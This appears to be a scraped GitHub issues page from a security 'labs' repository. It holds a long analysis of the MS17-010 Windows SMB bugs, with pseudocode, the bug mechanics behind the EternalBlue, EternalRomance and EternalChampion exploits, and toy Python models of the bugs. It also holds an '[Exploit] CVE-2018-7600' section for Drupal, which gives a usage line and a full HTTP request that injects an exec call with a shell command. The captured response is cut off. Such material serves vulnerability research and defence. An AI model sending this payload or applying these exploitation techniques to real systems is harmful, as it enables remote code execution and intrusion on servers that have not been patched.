labs's People

Contributors: hajdbo, nixawk, notre1


labs's Issues

guide

INFO:main:target: https://auth.westeros.XYZABC.it/
INFO:main:status: 200: Server: nginx
INFO:main:status: 200: Server: nginx
INFO:main:[?] Unknown Vulnerable

Unable to find the server version; I guess it has been patched already.

[Analysis] MS17_010

Nice Job From: https://github.com/worawit/MS17-010/blob/master/BUG.txt

===============
SMB Transaction
===============
To understand the bugs, we need to understand SMB transactions because most bugs in MS17-010 are related to transactions.
I try to make it short.

SMB message structure is well documented in https://msdn.microsoft.com/en-us/library/ee441702.aspx. We might need it 
for reference.

As documented in https://msdn.microsoft.com/en-us/library/ee441466.aspx, there are 6 SMB commands for transaction subprotocol.
If a transaction message is larger than SMB message (determined by MaxBufferSize in session parameter), a client 
MUST use one or more SMB_COM_*TRANSACT*_SECONDARY command (with same TID, UID, PID and MID in SMB header) to send 
transaction message that did not fit in the initial message.

Each SMB transaction command has subcommand codes. There are 3 groups of transaction subcommands as documented in
https://msdn.microsoft.com/en-us/library/ee441514.aspx (because SMB_COM_*TRANSACT*_SECONDARY commands are needed to 
send a large transaction message).

Now, we go through some implementation details of the Windows SMB transaction.
- A TRANSACTION struct and transaction data buffer are always allocated in 1 buffer. In memory, a TRANSACTION struct
  is always followed by data buffer as shown below.
    +-----------------+--------------------------------------------+
    |   TRANSACTION   |   transaction data buffer                  |
    +-----------------+--------------------------------------------+

- A transaction buffer is a paged pool buffer.
- There is a lookaside list for transaction buffers whose size is 0x5000.
  - if size <= 0x5000, use the lookaside
    - all buffers will be 0x5000 bytes (even if the required buffer size is only 0x100)
  - if size > 0x5000, directly allocate from paged pool
  - if the transaction command is SMB_COM_TRANSACTION and SetupCount is 0, directly allocate from paged pool

- TRANSACTION important struct member
  - InSetup : The pointer to received setup in transaction data buffer.
  - OutSetup : The pointer to reply setup (is set when all transaction data is received and NOT in transaction data buffer).
  - InParameters : The pointer to received parameter(s) in transaction data buffer.
  - OutParameters : The pointer to reply parameter(s) in transaction data buffer.
  - InData : The pointer to received data in transaction data buffer.
  - OutData : The pointer to reply data in transaction data buffer.
  - SetupCount : The number of setup words that are included in the transaction request.
                 This one determines InSetup buffer size.
  - MaxSetupCount : Maximum number of setup bytes that the client will accept in the transaction reply.
                    This one determines OutSetup buffer size.
  - ParameterCount : The current number of received parameter bytes or the number of parameter to be sent in reply.
  - TotalParameterCount : The total number of parameter bytes to be sent in this transaction request.
                          This one determines InParameters buffer size.
  - MaxParameterCount : The maximum number of parameter bytes that the client will accept in the transaction reply.
                        This one determines OutParameters buffer size.
  - DataCount : The current number of received data bytes or the number of data to be sent in reply.
  - TotalDataCount : The total number of data bytes to be sent in this transaction request.
                     This one determines InData buffer size.
  - MaxDataCount : The maximum number of data bytes that the client will accept in the transaction reply.
                   This one determines OutData buffer size.
  - Function : The NT transaction subcommand code.
  - Tid : The transaction Tid.
  - Pid : The transaction Pid.
  - Uid : The transaction Uid.
  - Mid/Fid : The transaction Mid.
  - AllDataReceived : The boolean which is set to 1 when (ParameterCount == TotalParameterCount && DataCount == TotalDataCount).

- There are 3 memory layouts for the InParameters, OutParameters, InData and OutData buffers in the transaction data buffer.
  - memory layout for SMB_COM_TRANSACTION except TRANS_MAILSLOT_WRITE and "TRANS with zero SetupCount" is shown below.
    In* and Out* buffers are overlapped.
      +---------------+------------------------------------------------------+
      |  TRANSACTION  |             transaction data buffer                  |
      +---------------+------------------------------------------------------+
                      | InSetup |   InParameters   |      InData       |     |
                      +------------------------------------------------------+
                      |  OutParameters  |            OutData                 |
                      +------------------------------------------------------+
  - memory layout for SMB_COM_TRANSACTION2 and exception case from above SMB_COM_TRANSACTION is shown below.
    All buffers are not overlapped.
      +---------------+------------------------------------------------------------------------------+
      |  TRANSACTION  |                       transaction data buffer                                |
      +---------------+------------------------------------------------------------------------------+
                      | InSetup |  InParameters  |     InData     |  OutParameters  |    OutData     |
                      +------------------------------------------------------------------------------+
  - memory layout for SMB_COM_NT_TRANS is shown below. InParameters and OutParameters are overlapped. 
    InData and OutData are overlapped.
      +---------------+-----------------------------------------------------------+
      |  TRANSACTION  |               transaction data buffer                     |
      +---------------+-----------------------------------------------------------+
                      | InSetup |      InParameters    |     InData      |        |
                      +---------+----------------------+--------------------------+
                      |         |  OutParameters  |    |        OutData           |
                      +-----------------------------------------------------------+
  
- A transaction is executed when (ParameterCount == TotalParameterCount && DataCount == TotalDataCount).
- While executing transaction, InParameters and InData pointer might be modified.
- After transaction is executed, ParameterCount and DataCount (is normally set in called transaction function) are used 
  for determining the reply size of OutParameters and OutData respectively.

- A SMB_COM_*_SECONDARY request can be used to overwrite already sent transaction parameters and data by using a displacement.
  ParameterCount and DataCount are added no matter what the (valid) displacement value is.
  - assume TotalParameterCount is 0 and TotalDataCount is 16
  - the first transaction request has 8 bytes of data
  - a secondary transaction request can have 8 bytes of data with displacement 0
    - the 8 bytes of data from the first transaction request are overwritten
    - the next 8 bytes of data are never written
- For multipiece transaction (transaction that used secondary to complete transaction), a server uses 
  last SMB_COM_*_SECONDARY command to determine transaction type.
  - if last command is SMB_COM_TRANSACTION_SECONDARY, a server executes subcommand as TRANS_*.
  - if last command is SMB_COM_TRANSACTION2_SECONDARY, a server executes subcommand as TRANS2_*.
  - if last command is SMB_COM_NT_TRANSACT_SECONDARY, a server executes subcommand as NT_TRANSACT_*.
- A transaction is also used in SMB_COM_WRITE_ANDX command (https://msdn.microsoft.com/en-us/library/ee441954.aspx)
  when WriteMode is RAW_MODE. The transaction uses FID in parameters instead of MID in SMB header for
  matching transaction.

That should be enough for SMB transactions. It's time to start the bug details.
Below are the bugs I found from the MS17-010 diff.



===========
Bug1: Uninitialized transaction InParameters and InData buffer
===========
A transaction data buffer is not initialized. If we send a multipiece transaction request with displacement 0,
a server will use uninitialized parameters and data for input. Uninitialized input here is normally useless
because a server processes input parameters and data as untrusted data.

If we find a transaction subcommand that uses part of the input as output, we could use this bug for 
leaking uninitialized data.

A transaction subcommand that is perfect for exploiting this bug is NT_TRANSACT_RENAME. NT_TRANSACT_RENAME 
is documented as "Not implemented". But there is code in the SrvSmbNtRename() function.

Here is pseudocode for SrvSmbNtRename()

SrvSmbNtRename()
{
    // ParameterCount must be >= 4
    // first 2 bytes of InParameters is fid
    // verify fid
    // if verification failed, return error without data
    // if verification success, return success without modifying OutParameters, ParameterCount, OutData, DataCount
}

But, as mentioned above, transaction InData and OutData are overlapped. Without modifying any 
transaction *Parameter* and *Data*, a server returns InData (like echo).

The only REQUIREMENT for using the NT_TRANSACT_RENAME command is a valid fid. So we need to get a fid by opening 
any named pipe or share first.

This bug is not helpful for exploitation because the leaked info is from a freed buffer. It is difficult to get 
exact information because a transaction size is always >= 0x5000.

Here are some uses of this bug:
- detect a target architecture (32 or 64 bit) from a leaked pointer
- might contain important data

The PoC filename for this bug is infoleak_uninit.py

Note:
- this bug is not used in NSA leak tools.
- because the fix only zeroes the InParameters and InData buffers, it is still possible to do information disclosure
  from OutParameters and OutData. The May17 security patches fix information disclosure from OutParameters and OutData in
  various functions (without zeroing the whole OutParameters and OutData buffers).
- May17 security patches modify SrvSmbNtRename() to return an error.



===============
Bug2: TRANS_PEEK_NMPIPE transaction subcommand expects MaxParameterCount to be 16
===============
SrvPeekNamedPipe() is used for handling TRANS_PEEK_NMPIPE subcommand (https://msdn.microsoft.com/en-us/library/ee441845.aspx).
It peeks the named pipe data to OutParameters buffer. The named pipe data is placed at OutParameters+16.
If MaxParameterCount is 16, OutData will point to correct named pipe data. By setting MaxParameterCount larger than 16, 
we can leak uninitialized OutData buffer. But we can do better by using it with Bug3.

The fix of this bug is used by scanners to determine if MS17-010 has been patched or not.

SrvAllocationTransaction() is used for allocating a transaction struct and data buffer. If a transaction data buffer size is 
greater than 0x10400, SrvAllocationTransaction() will set the pointer to the transaction to NULL. Then, the server replies with 
the error code 0xC0000205 (STATUS_INSUFF_SERVER_RESOURCES).

When sending a large MaxParameterCount and MaxDataCount (their sum is > 0x10400), we will get the error code 0xC0000205.
Because the MS17-010 patch changes MaxParameterCount to 16 if the transaction subcommand is TRANS_PEEK_NMPIPE before calling 
SrvAllocationTransaction(), SrvPeekNamedPipe() will be called even if the sum of MaxParameterCount and MaxDataCount is > 0x10400.
The response from SrvPeekNamedPipe() depends on our InSetup.



===============
Bug3: Transaction reply data size might be larger than allocated buffer size
===============
SrvCompleteExecuteTransaction() function is used for sending transaction reply to a client. But it has no check if
ParameterCount/DataCount is larger than MaxParameterCount/MaxDataCount. SrvCompleteExecuteTransaction() might
copy reply data from outside of buffer (OOB read) to client. This can lead to information disclosure.

To exploit the bug, we send a TRANS_PEEK_NMPIPE transaction subcommand (Bug2) with MaxParameterCount set to a very large value and 
MaxDataCount set to 1. If the transaction reply data size (DataCount) is more than MaxDataCount, SrvCompleteExecuteTransaction() 
will send OutData and the data next to the OutData buffer to the client. The transaction buffer should look like below.
    +---------------+-----------------------------------------------------+
    |  TRANSACTION  |            transaction data buffer                  |
    +---------------+-----------------------------------------------------+
                    | InSetup |  InParameters  |       InData       |     |
                    +-----------------------------------------------------+------------+
                    |           OutParameters                     |OutData|  OOB read  |
                    +-----------------------------------------------------+------------+

The NSA eternalromance uses this bug and Bug2 to do an info disclosure. The PoC file is eternalromance_leak.py.

The bug is fixed in Windows 8 (since release) and later. MS17-010 adds the same code as Windows 8 to fix this bug on Windows<8.

NSA eternalromance relies on this bug to leak TRANSACTION struct. So NSA eternalromance cannot exploit Windows 8 and later.



===============
Bug4: Transaction ParameterCount/DataCount might be greater than TotalParameterCount/TotalDataCount
===============
When sending an SMB_COM_*_SECONDARY command, a server checks the displacement value and the data size so that it does not write outside of the
allocated buffer. But there is no check if the total received ParameterCount/DataCount is greater than
TotalParameterCount/TotalDataCount.

For example:
- a transaction with TotalDataCount=0x20
- first request, send 0x18 bytes of data (DataCount=0x18)
- next request, send 0x10 bytes of data (DataCount=0x28)

Normally, this bug is not useful for exploitation. But it can be used with Bug5 (below).
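The displacement rule from the introduction (16-byte transaction, 8 bytes sent twice at displacement 0), the missing reply-size check of Bug3 and the missing total-count check of Bug4 are easier to see on a small model. The following Python toy is an added example written for this page; it is not code from worawit's repository or from srv.sys. The Transaction class, its method names and the buffer sizes are assumptions that only follow the behaviour the text describes: strict=False reproduces the pre-MS17-010 behaviour and strict=True adds the two checks the text says are missing.

```python
"""Toy model of SMB1 transaction reassembly and reply sizing (constructed for this page)."""


class TransactionError(Exception):
    """Raised where the modelled server would answer with an SMB error."""


class Transaction:
    """One TRANSACTION struct with its data buffer. strict=False reproduces the pre-MS17-010
    behaviour described in the text; strict=True adds the two checks the text says are missing."""

    def __init__(self, total_param_count, total_data_count,
                 max_param_count, max_data_count, strict=False):
        self.total_param_count = total_param_count
        self.total_data_count = total_data_count
        self.max_param_count = max_param_count
        self.max_data_count = max_data_count
        self.strict = strict
        # In* buffers are sized from Total*Count, Out* buffers from Max*Count (assumed sizes)
        self.in_params = bytearray(total_param_count)
        self.in_data = bytearray(total_data_count)
        self.out_params = bytearray(max_param_count)
        self.out_data = bytearray(max_data_count)
        self.param_count = 0
        self.data_count = 0
        self.all_data_received = False

    @staticmethod
    def _place(buf, displacement, piece):
        """The check the server does have: a piece must fit inside the allocated buffer."""
        if displacement + len(piece) > len(buf):
            raise TransactionError("piece would write outside the allocated buffer")
        buf[displacement:displacement + len(piece)] = piece

    def receive(self, params=b"", param_disp=0, data=b"", data_disp=0):
        """Process the first request or a *_SECONDARY request; returns AllDataReceived."""
        if self.all_data_received:
            raise TransactionError("secondary request after AllDataReceived")
        self._place(self.in_params, param_disp, params)
        self._place(self.in_data, data_disp, data)
        # Counts are added whatever the displacement was (the overwrite rule from the introduction)
        self.param_count += len(params)
        self.data_count += len(data)
        if self.strict and (self.param_count > self.total_param_count
                            or self.data_count > self.total_data_count):
            raise TransactionError("more bytes than TotalParameterCount/TotalDataCount")  # Bug4 check
        self.all_data_received = (self.param_count == self.total_param_count
                                  and self.data_count == self.total_data_count)
        return self.all_data_received

    def reply_overread(self, param_count, data_count):
        """Bytes SrvCompleteExecuteTransaction() would copy from beyond OutParameters/OutData
        for the reply sizes a subcommand handler left in ParameterCount/DataCount."""
        if self.strict and (param_count > self.max_param_count
                            or data_count > self.max_data_count):
            raise TransactionError("reply larger than MaxParameterCount/MaxDataCount")  # Bug3 check
        return (max(0, param_count - self.max_param_count),
                max(0, data_count - self.max_data_count))


def displacement_overwrite():
    """Introduction scenario: Total 0/16, 8 data bytes, then 8 more at displacement 0."""
    t = Transaction(0, 16, 0, 0)
    t.receive(data=b"A" * 8)
    done = t.receive(data=b"B" * 8, data_disp=0)
    return done, t.data_count, bytes(t.in_data)


def count_overrun(strict):
    """Bug4 scenario: TotalDataCount 0x20, 0x18 bytes, then 0x10 more bytes (DataCount 0x28).
    Returns the final DataCount, or None when the modelled server rejected the piece."""
    t = Transaction(0, 0x20, 0, 0, strict=strict)
    t.receive(data=b"A" * 0x18)
    try:
        t.receive(data=b"B" * 0x10, data_disp=0x10)
    except TransactionError:
        return None
    return t.data_count


def reply_overrun(strict):
    """Bug3 scenario: a handler reports 0x100 reply data bytes, but MaxDataCount was 1.
    Returns (parameter overread, data overread), or None when the reply was refused."""
    t = Transaction(0, 0, 0x800, 1, strict=strict)
    try:
        return t.reply_overread(0, 0x100)
    except TransactionError:
        return None


if __name__ == "__main__":
    print(displacement_overwrite())
    print(count_overrun(False), count_overrun(True))
    print(reply_overrun(False), reply_overrun(True))
```

displacement_overwrite() reports AllDataReceived set with only the first 8 bytes ever written, count_overrun(False) ends with DataCount 0x28 against a 0x20-byte buffer while count_overrun(True) rejects the second piece, and reply_overrun(False) shows 0xff bytes that would be copied from past OutData while reply_overrun(True) refuses the reply.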



===============
Bug5: Transaction secondary request is accepted and processed after transaction execution is started
===============
If we send a transaction secondary request to a transaction whose AllDataReceived member has already been set, a server will 
send back an error without processing the request.

For a multipiece transaction, AllDataReceived is set (in SrvSmbTransactionSecondary()/SrvSmbNtTransactionSecondary()) before 
executing the transaction. But AllDataReceived is NOT set (in SrvSmbTransaction()/SrvSmbNtTransaction()) when the transaction is 
completed in 1 SMB message. This allows us to send a transaction secondary request to modify the InParameters/InData buffer and 
ParameterCount/DataCount while the server is executing a transaction or sending a reply.


The first case to exploit this bug is sending a transaction secondary request while a server is sending a reply. The result is
that a server replies with data outside of the OutData buffer (similar to Bug3). But this method seems to be a race condition that is difficult to win.
NSA eternalchampion and eternalsynergy use a very nice trick to always win this race condition.

When doing SMB login, we send SMB_COM_SESSION_SETUP_ANDX (https://msdn.microsoft.com/en-us/library/ee442101.aspx) request to
a server. The request contains MaxBufferSize field (https://msdn.microsoft.com/en-us/library/ee441849.aspx) which is 
the maximum size, in bytes, of the largest SMB message that the client can receive.

If a transaction reply size is larger than MaxBufferSize, a server will send multiple transaction replies to a client. To resume
sending the next transaction reply, a server adds a work queue item to call the RestartTransactionResponse() function. Moreover, 
RestartTransactionResponse() has no check about MaxParameterCount and MaxDataCount.

With the above information, the NSA exploit sends SMB_COM_SESSION_SETUP_ANDX (login) with a specific MaxBufferSize. Then, the exploit
creates one complete NT_TRANS_RENAME request whose response size is larger than MaxBufferSize and one NT_TRANS_RENAME 
secondary request whose data count is the number of bytes to leak. Finally, the exploit sends these 2 requests in 1 TCP packet.

After a server sends the first part of the transaction reply, the server queues a call to RestartTransactionResponse() after the NT_TRANS_RENAME
secondary request. The transaction DataCount is increased when processing the NT_TRANS_RENAME secondary request (this works 
because of Bug4). Then, the server sends the second part of the transaction reply with data outside of the OutData buffer.

We can see PoC for leaking information with this bug in eternalchampion_leak.py and eternalsynergy_leak.py. I do not know why
both exploits use different parameters.


Another case to exploit this bug is sending a transaction secondary request while a server is executing a transaction. In this case
it is very difficult to find an exploit path, and it requires winning a race (champion). The NSA eternalchampion uses
TRANS2_QUERY_PATH_INFORMATION subcommand (https://msdn.microsoft.com/en-us/library/ee441634.aspx) with 
SMB_INFO_IS_NAME_VALID query information level (https://msdn.microsoft.com/en-us/library/ff470079.aspx).

In the SrvSmbQueryPathInformation() function with the SMB_INFO_IS_NAME_VALID information level, the transaction InData pointer is 
modified to point to a UNICODE_STRING struct allocated on the stack. After the InData pointer is modified, if a server processes a transaction
secondary request before executing the transaction is finished, the stack data (saved eip/rip) will be overwritten at a certain offset 
by the data and dataDisplacement in the transaction secondary. Because the offset in the stack is always fixed, NSA eternalchampion has no
chance to crash a target.

The PoC file for this bug is eternalchampion_poc.py

Note: I found the same fix for this bug in SrvSmbWriteAndX() too



===============
Bug6: Transaction secondary can be used with any transaction type
===============
Normally SMB_COM_TRANSACTION command must be followed by SMB_COM_TRANSACTION_SECONDARY command, SMB_COM_TRANSACTION2 command must be 
followed by SMB_COM_TRANSACTION2_SECONDARY command and SMB_COM_NT_TRANS command must be followed by SMB_COM_NT_TRANS_SECONDARY
command if transaction data in first SMB message is not complete. But a server has no check. So we can send any transaction 
secondary command (which matches TID, UID, PID and MID) to complete a transaction.

Do not forget that a server uses last SMB_COM_*_SECONDARY command to determine transaction type. So we can turn any transaction type
to be SMB_COM_TRANSACTION or SMB_COM_TRANSACTION2. We cannot turn non SMB_COM_NT_TRANS to SMB_COM_NT_TRANS because SMB_COM_NT_TRANS
uses Function to determine transaction subcommand.

This bug is used in the NSA eternalblue exploit for sending large transaction data (>= 0x10000 bytes) for TRANS2_OPEN2. Because only 
the SMB_COM_NT_TRANS request uses 4 bytes for the TotalDataCount field (others use 2 bytes), the exploit has to start a transaction with
the SMB_COM_NT_TRANS command followed by SMB_COM_TRANSACTION2_SECONDARY commands.
You can see an example usage in eternalblue_poc.py.

As I mentioned in the introduction section, a transaction is also used in the SMB_COM_WRITE_ANDX command when WriteMode is RAW_MODE.
This is a very interesting case because SrvSmbWriteAndX() writes data to the transaction with the code below.

    memmove(transaction->InData, request->data, request->dataLength);
    transaction->InData += request->dataLength; // shift InData pointer
    transaction->DataCount += request->dataLength;

Notice that SrvSmbWriteAndX() shifts InData pointer when writing data, while transaction secondary uses dataDisplacement to set
where to write a data in InData buffer (without moving InData).

Assume we start a transaction with TotalDataSize=0x2000 with a MID value the same as the FID of an open named pipe. The memory layout looks
like below (I omit OutParameters and OutData because they are not related).

    +---------------+-----------------------------------------------------+
    |  TRANSACTION  |            transaction data buffer                  |
    +---------------+-----------------------------------------------------+
                    | InSetup |   InParameters   |        InData          |
                    +-----------------------------------------------------+

Then, we send a SMB_COM_WRITE_ANDX command with WriteMode=RAW_MODE and 0x100 bytes of data.

    +---------------+-----------------------------------------------------+
    |  TRANSACTION  |            transaction data buffer                  |
    +---------------+-----------------------------------------------------+
                    | InSetup |   InParameters   |    |       InData           |
                    +-----------------------------------------------------+

Then, writing outside the transaction data buffer is possible if we send a transaction secondary command with dataDisplacement=0x1f??.

This OOB write is very good for exploitation; however, the SMB_COM_WRITE_ANDX command with a RAW_MODE write requires a valid named pipe fid.
Since Windows Vista, the default Windows configuration without additional services does not allow an anonymous logon (NULL session)
to access any named pipe.

You can see PoC in eternalromance_poc.py and eternalsynergy_poc.py (with large paged groom method to show another heap spraying method).

Note: NSA eternalromance and eternalsynergy use this bug for OOB write. Eternalromance uses Bug3 for leaking transaction struct
(which is limited to Windows<8) but eternalsynergy uses Bug5 for leaking transaction struct and some trick to find 
a NonPagedPoolExecute page (I do not check how exploit exactly work) in Windows 8 and Windows 2012.


===============
Bug7: Wrong type assignment in SrvOs2FeaListSizeToNt()
===============
The FEA (Full Extended Attribute), https://msdn.microsoft.com/en-us/library/ee915515.aspx, is used in SMB_COM_TRANSACTION2 subcommands.
Normally we need to send a FEA_LIST (https://msdn.microsoft.com/en-us/library/ff359296.aspx) in SMB_COM_TRANSACTION2 subcommand requests.
When processing an SMB_COM_TRANSACTION2 subcommand request with a FEA_LIST, Windows needs to convert the FEA_LIST to a list of 
FILE_FULL_EA_INFORMATION (https://msdn.microsoft.com/en-us/library/cc232069.aspx).

There is a bug while converting FEA_LIST to FILE_FULL_EA_INFORMATION if FEA_LIST.SizeOfListInBytes is >= 0x10000. SrvOs2FeaListToNt()
is used for the conversion; it has the following pseudocode.

SrvOs2FeaListToNt()
{
    outputLen = SrvOs2FeaListSizeToNt(feaList);
    output = SrvAllocateNonPagedPool(outputLen);
    // start copy all FEA data to output in a list of FILE_FULL_EA_INFORMATION format
}

SrvOs2FeaListSizeToNt(feaList)
{
    outputLen = 0;
    foreach (fea in feaList) {
        if (IsFeaDataOutOfBound(fea, feaList)) {
            // shrink feaList.SizeOfListInBytes to only valid fea so copy step does not need to check again.
            // feaList.SizeOfListInBytes is DWORD but it is cast to WORD so HIDWORD is not modified.
            (WORD) feaList.SizeOfListInBytes = Pos(fea) - Pos(feaList);
            return outputLen;
        }
        outputLen += GetNtLengthForFea(fea);
    }
    return outputLen;
}

From the above pseudocode, if we send feaList.SizeOfListInBytes=0x10000 while the valid FEA entries in the list are less than
0x10000 bytes (assume 0x4000), feaList.SizeOfListInBytes will be modified to 0x14000 because HIDWORD is not modified and
outputLen is only 0x4000. Then the output buffer will be overflowed while copying FEA data to the output buffer.
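To see why the WORD-sized store matters, here is an added Python model of the two steps in the pseudocode above (the size walk and the copy that trusts the shrunk SizeOfListInBytes). It is not worawit's code and not srv.sys: the simplified FEA entry encoding, the NT size formula, the 0x14000-byte buffer padding and all function names are assumptions; the values 0x10000 and 0x4000 come from the text. word_cast=True reproduces the pre-patch 16-bit store and word_cast=False stores the full 32-bit value.

```python
"""Model of the SrvOs2FeaListSizeToNt() WORD-store bug (constructed; not srv.sys code)."""
import struct

# ExtendedAttributeFlag, AttributeNameLengthInBytes, AttributeValueLengthInBytes
FEA_HDR = struct.Struct("<BBH")


def fea_entry(name, value):
    """Simplified SMB_FEA encoding assumed here: 4-byte header, name, NUL, value."""
    return FEA_HDR.pack(0, len(name), len(value)) + name + b"\x00" + value


def nt_size(name_len, value_len):
    """Space one entry takes as FILE_FULL_EA_INFORMATION: 8-byte header, name, NUL, value, 4-byte aligned."""
    return (8 + name_len + 1 + value_len + 3) & ~3


def fea_list_size_to_nt(buf, word_cast):
    """Model of SrvOs2FeaListSizeToNt(): walk the list, sum the NT sizes of the in-bounds
    entries and shrink SizeOfListInBytes at the first entry that runs past the list.
    Returns (SizeOfListInBytes as left in the header, outputLen)."""
    size_of_list, = struct.unpack_from("<I", buf, 0)
    end = 4 + size_of_list
    pos, output_len = 4, 0
    while pos + 4 <= min(end, len(buf)):
        _, nlen, vlen = FEA_HDR.unpack_from(buf, pos)
        entry_len = 4 + nlen + 1 + vlen
        if pos + entry_len > end:                  # IsFeaDataOutOfBound()
            valid = pos - 4
            if word_cast:                          # (WORD) SizeOfListInBytes = valid: high 16 bits kept
                size_of_list = (size_of_list & 0xFFFF0000) | (valid & 0xFFFF)
            else:                                  # corrected: full 32-bit store
                size_of_list = valid
            return size_of_list, output_len
        output_len += nt_size(nlen, vlen)
        pos += entry_len
    return size_of_list, output_len


def conversion_overflows(buf, word_cast):
    """Model of the copy step in SrvOs2FeaListToNt(): it allocates outputLen bytes and then
    trusts the (shrunk) SizeOfListInBytes without re-checking each entry.
    Returns (overflow, outputLen, SizeOfListInBytes used by the copy loop)."""
    size_of_list, output_len = fea_list_size_to_nt(buf, word_cast)
    end = 4 + size_of_list
    pos, written = 4, 0
    while pos + 4 <= min(end, len(buf)):
        _, nlen, vlen = FEA_HDR.unpack_from(buf, pos)
        entry_len = 4 + nlen + 1 + vlen
        if pos + entry_len > len(buf):             # the model stays inside the Python buffer
            break
        written += nt_size(nlen, vlen)
        pos += entry_len
    return written > output_len, output_len, size_of_list


def build_constructed_list():
    """Constructed InData buffer: the header claims 0x10000 bytes, 0x4000 bytes of valid entries
    follow, then one entry whose value length runs past the claimed end. The buffer is padded
    to 0x14000 bytes to stand in for a transaction data buffer that large (an assumed size)."""
    valid = b"".join(fea_entry(b"e%02x" % i, b"v" * 248) for i in range(0x40))  # 0x40 * 0x100 bytes
    assert len(valid) == 0x4000
    overlong = FEA_HDR.pack(0, 3, 0xC000) + b"bad" + b"\x00"                     # value would end at 0x1000c
    buf = struct.pack("<I", 0x10000) + valid + overlong
    return buf + b"\x00" * (4 + 0x14000 - len(buf))


if __name__ == "__main__":
    sample = build_constructed_list()
    for word_cast in (True, False):
        print("word_cast=%s:" % word_cast, fea_list_size_to_nt(sample, word_cast),
              conversion_overflows(sample, word_cast))
```

With word_cast=True the walk returns SizeOfListInBytes 0x14000 with outputLen 0x4100 (the NT size of the 0x4000 valid bytes), and the copy model writes past that allocation; with word_cast=False the stored size is 0x4000 and the copy stays within outputLen.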

As mentioned above, we need to send transaction data that is larger than 0x10000 bytes. But the FEA_LIST data is used
only in SMB_COM_TRANSACTION2, whose TotalDataCount is a USHORT (max is 0xffff). So we need Bug6 to send FEA_LIST 
data that is larger than 0x10000.

The exploit path that requires the minimum conditions is the TRANS2_OPEN2 subcommand. SrvSmbOpen2() calls SrvOs2FeaListToNt()
to convert the FEA_LIST before any permission checking. So a client just needs to access any share (IPC$ is the best choice)
and be able to send SMB_COM_NT_TRANS and SMB_COM_TRANSACTION2_SECONDARY commands.

The above exploitation requirements are good for Windows<8 because Windows<8 always allows anonymous (NULL session) to 
access IPC$ and send transaction commands. However, Windows>=8 does not allow anonymous to access IPC$ by default 
(IPC$ might be accessible but most of the transaction commands cannot be used).

You can see PoC in eternalblue_poc.py



===============
Bug8: Wrong type assignment in SrvOs2GeaListSizeToNt()
===============
The bug is the same as Bug7 in a different function, but all exploit paths require a valid fid.



===============
Bug9: SESSION_SETUP_AND_X request format confusion
===============
This bug is not fixed in MS17-010. I put it here because NSA leak tools use it for exploitation. The bug itself 
can only fool a server to allocate a large nonpaged pool (<0x20000) for storing small client information.

There are 2 formats of the SMB_COM_SESSION_SETUP_ANDX request for the "NT LM 0.12" dialect. The first format is documented
in https://msdn.microsoft.com/en-us/library/ee441849.aspx. It is used for LM and NTLM authentication. The other format
is documented in https://msdn.microsoft.com/en-us/library/cc246328.aspx. It is used for NTLMv2 (NTLM SSP) authentication.
Note that these 2 formats have different WordCounts (the first one is 13 and the latter is 12).

The SMB_COM_SESSION_SETUP_ANDX request is handled by the BlockingSessionSetupAndX() function. Below is pseudocode for handling
both request formats (only the related part).

BlockingSessionSetupAndX()
{
    // ...
    
    // check word count
    if (! (request->WordCount == 13 || (request->WordCount == 12 && (request->Capabilities & CAP_EXTENDED_SECURITY))) ) {
        // error and return
    }
    
    // ...
    
    if ((request->Capabilities & CAP_EXTENDED_SECURITY) && (smbHeader->Flags2 & FLAGS2_EXTENDED_SECURITY)) {
        // this request is Extend Security request
        GetExtendSecurityParameters();  // extract parameters and data to variables
        SrvValidateSecurityBuffer();  // do authentication
    }
    else {
        // this request is NT Security request
        GetNtSecurityParameters();  // extract parameters and data to variables
        SrvValidateUser();  // do authentication
    }
    
    // ...
}

From the pseudocode above, if we send an SMB_COM_SESSION_SETUP_ANDX request as Extended Security (WordCount 12) with 
CAP_EXTENDED_SECURITY but no FLAGS2_EXTENDED_SECURITY, the request will be processed as an NT Security request (WordCount 13).
We can also send the request as an NT Security request (WordCount 13) with CAP_EXTENDED_SECURITY and FLAGS2_EXTENDED_SECURITY.
But the latter case is of no use because there is an extra check of the ByteCount value in the GetExtendSecurityParameters() function.

Normally a server validates the WordCount and ByteCount fields in the SrvValidateSmb() function before passing a request to 
the request handler. WordCount*2 and ByteCount must not be larger than the received data size. With the confusion bug, a server
reads ByteCount from the wrong offset while extracting parameters and data to variables.

The bug does not cause any memory corruption or information disclosure because the ByteCount value is only used for calculating
the buffer size for storing the NativeOS and NativeLanMan unicode strings (UTF16). The NativeOS and NativeLanMan size is calculated from 
"ByteCount - other_data_size". The buffer for the NativeOS and NativeLanMan unicode strings is allocated on nonpaged pool.

NSA eternalchampion uses this bug to set UNICODE_STRING.MaximumLength to 0x15ff and place staging shellcode in buffer because 
nonpaged pool is executable on Windows<8.
Note: On x86, 'ff15????????' is 'call [????????]' instruction. On x64, 'ff1500000000' is 'call [rip+0]'. 

NSA eternalblue uses this bug to create a hole because we can control when to allocate and free the buffer.

The PoC filename for this bug is npp_control.py and the example usages of this bug are eternalblue_exploit.py and eternalchampion_poc2.py

Note: This method cannot be used for user authentication if NTLM authentication is disabled

References

  1. https://github.com/worawit/MS17-010/blob/master/BUG.txt

[Exploit] CVE-2018-7600 - drupal: Unsanitized requests allow remote attackers to execute arbitrary code

Description

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

Exploit

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# CVE-2018-7600
# Drupal: Unsanitized requests allow remote attackers to execute arbitrary code

"""Tested against Drupal 8.4.5

$ wget -c https://ftp.drupal.org/files/projects/drupal-8.4.5.tar.gz
$ setup Apache2 + Mysql + Drupal

$ python exploit-CVE-2018-7600.py http://192.168.1.19 "pwd"
/var/www/html

----

POST /user/register?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 144
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail%5B%23type%5D=markup&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23markup%5D=printf admin | md5sum

HTTP/1.1 200 OK
Date: Fri, 13 Apr 2018 05:19:28 GMT
Server: Apache/2.4.29 (Debian)
Cache-Control: must-revalidate, no-cache, private
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
